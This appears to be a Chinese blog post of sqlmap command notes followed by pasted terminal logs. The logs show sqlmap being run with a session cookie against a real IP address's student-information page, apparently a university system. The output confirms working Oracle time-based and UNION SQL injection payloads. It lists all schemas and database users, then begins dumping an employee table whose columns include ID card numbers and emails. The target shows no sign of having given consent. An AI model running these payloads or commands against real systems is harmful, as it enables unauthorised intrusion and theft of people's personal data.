标签:lap param provided Owner cal auditd yam bounds get
sqlmap 手册参数整理文档
1、
--data
sqlmap -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users
2、SQLmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" "
3、sqlmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" --dbs
4、 SQLmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" --dump
5、 sqlmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" --dump -all
6、sqlmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" -D+(数据库名) --dump
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs
___
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .‘| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:48:22
[09:48:23] [INFO] resuming back-end DBMS ‘oracle‘
[09:48:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[09:48:23] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[09:48:23] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[09:48:23] [INFO] fetching database (schema) names
[09:48:23] [INFO] the SQL query used returns 27 entries
available databases [27]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[09:48:23] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/202.201.33.73‘
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D SYS --users
___
__H__
___ ___[(]_____ ___ ___ {1.1.12#stable}
|_ -| . [.] | .‘| . |
|___|_ [)]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:02:24
[10:02:25] [INFO] resuming back-end DBMS ‘oracle‘
[10:02:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:02:25] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:02:25] [INFO] fetching database users
[10:02:25] [INFO] the SQL query used returns 34 entries
[10:02:25] [INFO] retrieved: ANONYMOUS
[10:02:25] [INFO] retrieved: CTXSYS
[10:02:26] [INFO] retrieved: DBSNMP
[10:02:26] [INFO] retrieved: GS_KS
[10:02:26] [INFO] retrieved: HR
[10:02:26] [INFO] retrieved: MDSYS
[10:02:26] [INFO] retrieved: ODM
[10:02:26] [INFO] retrieved: ODM_MTR
[10:02:26] [INFO] retrieved: OE
[10:02:26] [INFO] retrieved: OLAPSYS
[10:02:26] [INFO] retrieved: ORDPLUGINS
[10:02:26] [INFO] retrieved: ORDSYS
[10:02:27] [INFO] retrieved: OUTLN
[10:02:27] [INFO] retrieved: PM
[10:02:27] [INFO] retrieved: QS
[10:02:27] [INFO] retrieved: QS_ADM
[10:02:27] [INFO] retrieved: QS_CB
[10:02:27] [INFO] retrieved: QS_CBADM
[10:02:27] [INFO] retrieved: QS_CS
[10:02:27] [INFO] retrieved: QS_ES
[10:02:27] [INFO] retrieved: QS_OS
[10:02:27] [INFO] retrieved: QS_WS
[10:02:27] [INFO] retrieved: RMAN
[10:02:28] [INFO] retrieved: SCOTT
[10:02:28] [INFO] retrieved: SH
[10:02:28] [INFO] retrieved: SYS
[10:02:28] [INFO] retrieved: SYSTEM
[10:02:28] [INFO] retrieved: TESTDB
[10:02:28] [INFO] retrieved: WKPROXY
[10:02:28] [INFO] retrieved: WKSYS
[10:02:28] [INFO] retrieved: WMSYS
[10:02:28] [INFO] retrieved: XDB
[10:02:28] [INFO] retrieved: XDGSNEW
[10:02:28] [INFO] retrieved: YJSANDRBAC
database management system users [34]:
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] GS_KS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_ADM
[*] QS_CB
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[10:02:28] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/202.201.33.73‘
[*] shutting down at 10:02:28
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D SYS -T
___
__H__
___ ___[)]_____ ___ ___ {1.1.12#stable}
|_ -| . [.] | .‘| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
Usage: python sqlmap [options]
sqlmap: error: -T option requires an argument
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D SYS --T
___
__H__
___ ___[,]_____ ___ ___ {1.1.12#stable}
|_ -| . [)] | .‘| . |
|___|_ [‘]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
Usage: python sqlmap [options]
sqlmap: error: no such option: --T
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .‘| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:04:03
[10:04:04] [INFO] resuming back-end DBMS ‘oracle‘
[10:04:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:04:04] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:04:04] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:04:04] [INFO] fetching database (schema) names
[10:04:04] [INFO] the SQL query used returns 27 entries
available databases [27]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[10:04:04] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/202.201.33.73‘
[*] shutting down at 10:04:04
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs --users
___
__H__
___ ___[,]_____ ___ ___ {1.1.12#stable}
|_ -| . [‘] | .‘| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:04:11
[10:04:12] [INFO] resuming back-end DBMS ‘oracle‘
[10:04:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:04:12] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:04:12] [INFO] fetching database users
[10:04:12] [INFO] the SQL query used returns 34 entries
database management system users [34]:
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] GS_KS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_ADM
[*] QS_CB
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[10:04:12] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:04:12] [INFO] fetching database (schema) names
[10:04:12] [INFO] the SQL query used returns 27 entries
available databases [27]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[10:04:12] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/202.201.33.73‘
[*] shutting down at 10:04:12
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -tables
___
__H__
___ ___[‘]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .‘| . |
|___|_ [)]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:05:02
[10:05:02] [INFO] setting file for logging HTTP traffic
[10:05:03] [INFO] resuming back-end DBMS ‘oracle‘
[10:05:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:05:03] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:05:03] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/202.201.33.73‘
[*] shutting down at 10:05:03
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -f --banner -users
___
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . [(] | .‘| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:06:51
[10:07:06] [CRITICAL] host ‘sers‘ does not exist
[*] shutting down at 10:07:06
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs
___
__H__
___ ___[.]_____ ___ ___ {1.1.12#stable}
|_ -| . [,] | .‘| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:43:00
[10:43:00] [INFO] resuming back-end DBMS ‘oracle‘
[10:43:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:43:01] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:43:01] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:43:01] [INFO] fetching database (schema) names
[10:43:01] [INFO] the SQL query used returns 27 entries
available databases [27]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[10:43:01] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/202.201.33.73‘
[*] shutting down at 10:43:01
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dump
___
__H__
___ ___[(]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .‘| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:44:45
[10:44:45] [INFO] resuming back-end DBMS ‘oracle‘
[10:44:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:44:46] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:44:46] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:44:46] [INFO] fetching current database
[10:44:46] [WARNING] on Oracle you‘ll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[10:44:46] [INFO] fetching tables for database: ‘XDGSNEW‘
[10:44:46] [INFO] the SQL query used returns 292 entries
[10:44:46] [INFO] fetching columns for table ‘BASE_EMPLOYEE160920‘ in database ‘XDGSNEW‘
[10:44:46] [INFO] the SQL query used returns 20 entries
[10:44:46] [INFO] resumed: "EMPLOYEEID","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEENO","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEENAME","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEENAME_EN","VARCHAR2"
[10:44:46] [INFO] resumed: "BORNDATE","DATE"
[10:44:46] [INFO] resumed: "GENDER","VARCHAR2"
[10:44:46] [INFO] resumed: "TECHNICTITLECODE","VARCHAR2"
[10:44:46] [INFO] resumed: "DUTY","VARCHAR2"
[10:44:46] [INFO] resumed: "CULTURELEVEL","VARCHAR2"
[10:44:46] [INFO] resumed: "DEGREE","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEETYPECODE","VARCHAR2"
[10:44:46] [INFO] resumed: "MENTORLEVEL","VARCHAR2"
[10:44:46] [INFO] resumed: "RESUME","VARCHAR2"
[10:44:46] [INFO] resumed: "EMAIL","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEEPHOTO","BLOB"
[10:44:46] [INFO] resumed: "IDCARDNO","VARCHAR2"
[10:44:46] [INFO] resumed: "DEPARTMENTCODE","VARCHAR2"
[10:44:46] [INFO] resumed: "CONTACTINFO","VARCHAR2"
[10:44:46] [INFO] resumed: "STATUS","VARCHAR2"
[10:44:46] [INFO] resumed: "SECTIONOFFICE","VARCHAR2"
[10:44:46] [INFO] fetching entries for table ‘BASE_EMPLOYEE160920‘ in database ‘XDGSNEW‘
[10:44:46] [INFO] the SQL query used returns 1433 entries
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
[10:48:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch ‘--no-cast‘ or switch ‘--hex‘
[10:48:45] [INFO] fetching number of entries for table ‘BASE_EMPLOYEE160920‘ in database ‘XDGSNEW‘
[10:48:45] [INFO] resumed: 1433
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed: ??
[10:48:45] [INFO] resumed: 08
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed: 06103010060710294427\x02A
[10:48:45] [INFO] resumed: ???
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed: 200309118
[10:48:45] [INFO] resumed:
[10:48:45] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option ‘--time-sec‘)? [Y/n] n
[10:50:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
^C
[10:52:03] [WARNING] Ctrl+C detected in dumping phase
Database: XDGSNEW
Table: BASE_EMPLOYEE160920
[1 entry]
+------------------------+------+-------+--------+--------+----------+------------+-------------+--------------+--------------+---------------+----------------+-----------------+------------------+
